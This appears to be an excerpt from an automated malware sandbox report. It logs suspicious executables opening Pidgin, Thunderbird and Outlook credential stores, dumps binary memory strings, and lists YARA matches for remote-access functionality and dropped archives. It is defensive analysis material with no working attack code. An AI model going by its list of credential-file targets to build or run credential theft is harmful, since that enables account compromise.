Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: bad48ea9ac.exe, 0000001F.00000003.2791393164.00000000012F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP
Source: bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: bad48ea9ac.exe, 0000000F.00000003.2681540160.0000000001653000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP/
Source: Yara match File source: 00000028.00000002.2907223447.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 590971cd60.exe PID: 5804, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000014.00000002.2888771295.0000000001868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2619416783.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2927751545.0000000008107000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.2871931818.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.2897094573.00000000002E1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.2553727448.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.2702706239.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2895798421.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000002.2895930049.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 590971cd60.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5236, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\aMLtP386CmzygUXw7MGrDsU.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4JKZLoG_AJreMfNRzAg0gnZ.zip, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B002D8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_00B002D8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AFF5E1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_00AFF5E1